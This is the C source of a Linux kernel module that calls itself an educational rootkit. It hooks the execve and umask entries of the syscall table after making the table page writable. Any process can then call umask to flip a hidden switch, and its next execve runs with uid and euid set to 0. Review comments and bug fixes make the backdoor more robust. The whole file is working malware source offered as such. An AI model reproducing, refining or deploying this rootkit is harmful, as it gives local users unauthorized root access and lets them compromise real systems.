/* An example (educational) rootkit: it hooks the execve and umask entries of the syscall table so that a userland process can be given root permissions */
#include <linux/cred.h>
#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <asm/cacheflush.h>
#include <asm/pgtable_types.h>
#include <asm/unistd.h>
/* Module metadata strings, consumed by the MODULE_* macros at the end of the file */
#define MV "1.1"
#define ML "GPL"
#define MD "Example Rootkit"
#define MA "@Pink_P4nther"
/* Root-escalation toggle: flipped by mal_umask(); while non-zero,
 * mal_execve() rewrites the caller's uid/euid to 0. Read and written
 * from syscall context without any locking. */
int ref = 0;
/* Address of the kernel's sys_call_table, resolved by set_sct_addr()
 * (NULL if the lookup failed). */
void **sct_address;
/* Original execve entry of the syscall table, saved before it is hooked.
 * NOTE(review): declared as returning int; x86_64 syscall entries return
 * long, so the return value is truncated through this pointer -- confirm
 * against the target kernel. */
asmlinkage int (*origin_execvecall) (const char *filename, const char *const argv[], const char *const envp[]);
/* Resolves sys_call_table through kallsyms and stores it in sct_address */
void set_sct_addr(void);
/* Mal execve hook syscall */
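/* Mal execve hook syscall.
 *
 * Replacement for the execve entry of the syscall table. When the global
 * toggle `ref` is set (flipped by mal_umask()), the calling task's uid and
 * euid are rewritten to 0 before the original execve handler runs;
 * otherwise the call is passed straight through. Only uid and euid are
 * changed: gid, suid and fsuid stay as the caller had them.
 *
 * @filename, @argv, @envp: forwarded unchanged to the original handler.
 * Returns whatever the original execve handler returns.
 *
 * Fix: prepare_creds() returns NULL on allocation failure and the original
 * dereferenced it unconditionally; on failure the hook now simply falls
 * through to the real execve instead of oopsing.
 *
 * NOTE(review): on x86_64 kernels >= 4.17 syscall handlers take a single
 * struct pt_regs * instead of these three arguments, so this signature
 * (and the int return, inherited from origin_execvecall) only matches
 * older kernels -- confirm the target before loading.
 */
asmlinkage int mal_execve(const char *filename, const char *const argv[], const char *const envp[])
{
	if (ref == 1) {
		struct cred *np;
		kuid_t nuid;

		printk(KERN_INFO "[+] Giving r00t!\n");
		/* New credential set for the current task; NULL on ENOMEM. */
		np = prepare_creds();
		if (np) {
			nuid.val = 0;
			np->uid = nuid;
			np->euid = nuid;
			/* commit_creds() takes over np; no put_cred() here. */
			commit_creds(np);
		}
	}
	/* Call original execve syscall */
	return origin_execvecall(filename, argv, envp);
}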
/* Umask syscall hook: original umask entry of the syscall table, saved by
 * hload() before it is hooked and invoked by mal_umask(). */
asmlinkage int (*origin_umaskcall) (mode_t mask);
/* Mal umask hook syscall */
/* Mal umask hook syscall: flips the root-escalation toggle.
 *
 * Every umask() call, from any process, inverts `ref` -- there is no
 * authentication or magic value involved -- and then the original umask
 * handler is invoked with the caller's mask unchanged.
 *
 * @mask: forwarded to the original handler.
 * Returns the original handler's result.
 */
asmlinkage int mal_umask(mode_t mask)
{
	/* 0 -> 1, anything non-zero -> 0 */
	ref = !ref;
	/* Call original umask syscall */
	return origin_umaskcall(mask);
}
/* Set SCT Address */
/* Set SCT Address: resolve sys_call_table through kallsyms.
 *
 * Stores the result in the global sct_address. kallsyms_lookup_name()
 * yields 0 for an unknown symbol, in which case sct_address becomes NULL;
 * callers must check it before indexing the table.
 *
 * NOTE(review): kallsyms_lookup_name() is no longer exported to modules on
 * recent kernels (5.7+), so this lookup only links on older kernels --
 * confirm against the target.
 */
void set_sct_addr(void)
{
	unsigned long table = kallsyms_lookup_name("sys_call_table");

	sct_address = (void **)table;
}
/* Make SCT writeable */
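/* Make SCT writeable: set _PAGE_RW on the PTE mapping sct_addr.
 *
 * @sct_addr: virtual address inside the page to unprotect.
 * Returns 0 on success, -EINVAL if lookup_address() finds no PTE for the
 * address (the original dereferenced the NULL result).
 *
 * Fix: the original tested `pte & ~_PAGE_RW`, which is true whenever any
 * *other* bit is set -- i.e. for every present PTE -- rather than when RW
 * is clear; the test now looks at the RW bit itself.
 *
 * NOTE(review): the PTE is edited in place with no TLB flush and without
 * the set_memory_rw() helper; whether a stale TLB entry matters here
 * depends on the target kernel -- confirm.
 */
int sct_w(unsigned long sct_addr)
{
	unsigned int level;
	pte_t *pte = lookup_address(sct_addr, &level);

	if (!pte)
		return -EINVAL;
	if (!(pte->pte & _PAGE_RW))
		pte->pte |= _PAGE_RW;
	return 0;
}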
/* Make SCT write protected */
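/* Make SCT write protected: clear _PAGE_RW on the PTE mapping sct_addr.
 *
 * @sct_addr: virtual address inside the page to re-protect.
 * Returns 0 on success, -EINVAL if lookup_address() finds no PTE for the
 * address (the original dereferenced the NULL result).
 *
 * NOTE(review): as in sct_w(), the PTE is edited in place with no TLB
 * flush -- confirm this is sufficient on the target kernel.
 */
int sct_xw(unsigned long sct_addr)
{
	unsigned int level;
	pte_t *pte = lookup_address(sct_addr, &level);

	if (!pte)
		return -EINVAL;
	pte->pte &= ~_PAGE_RW;
	return 0;
}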
/* Loads LKM */
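/* Loads LKM: resolve the syscall table, save the original execve/umask
 * entries and replace them with mal_execve()/mal_umask().
 *
 * Returns 0 on success, -ENOENT if sys_call_table could not be resolved,
 * or the error from sct_w() if the table page could not be made writable.
 *
 * Fixes: the original indexed sct_address without checking the lookup
 * result, ignored sct_w()'s return, and printed pointers with %llx (a
 * format/argument mismatch); pointers are now cast to unsigned long and
 * printed with %lx, and the log message is newline-terminated.
 */
static int __init hload(void)
{
	int rc;

	/* Set syscall table address */
	set_sct_addr();
	/* kallsyms_lookup_name() returns 0 for an unknown symbol. */
	if (!sct_address) {
		printk(KERN_ERR "[-] sys_call_table not found\n");
		return -ENOENT;
	}
	/* Set pointer to original syscalls */
	origin_execvecall = sct_address[__NR_execve];
	origin_umaskcall = sct_address[__NR_umask];
	/* Make SCT writeable */
	rc = sct_w((unsigned long)sct_address);
	if (rc) {
		printk(KERN_ERR "[-] cannot make sys_call_table writable\n");
		return rc;
	}
	/* Hook execve and umask syscalls */
	sct_address[__NR_execve] = mal_execve;
	sct_address[__NR_umask] = mal_umask;
	/* Set SCT write protected */
	sct_xw((unsigned long)sct_address);
	/* Raw (unhashed) kernel addresses end up in the log here. */
	printk(KERN_INFO "[?] SCT: [0x%lx]\n[?] EXECVE: [0x%lx]\n[?] UMASK: [0x%lx]\n",
	       (unsigned long)sct_address,
	       (unsigned long)sct_address[__NR_execve],
	       (unsigned long)sct_address[__NR_umask]);
	return 0;
}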
/* Unloads LKM */
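/* Unloads LKM: write the saved execve/umask entries back into the
 * syscall table and re-protect its page.
 *
 * Fix: if sys_call_table was never resolved (sct_address is NULL) there is
 * nothing to restore; the original would have indexed a NULL table.
 * The hooks must be restored before the module text goes away, otherwise
 * the table keeps pointing at unloaded code.
 */
static void __exit hunload(void)
{
	/* Nothing was hooked if the table lookup failed. */
	if (!sct_address)
		return;
	/* Rewrite the original syscall addresses back into the SCT page */
	sct_w((unsigned long)sct_address);
	sct_address[__NR_execve] = origin_execvecall;
	sct_address[__NR_umask] = origin_umaskcall;
	/* Make SCT page write protected */
	sct_xw((unsigned long)sct_address);
}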
/* Module metadata (strings defined near the top of the file) */
MODULE_LICENSE(ML);
MODULE_AUTHOR(MA);
MODULE_DESCRIPTION(MD);
MODULE_VERSION(MV);
/* Entry/exit points: hload() installs the hooks, hunload() restores the table */
module_init(hload);
module_exit(hunload);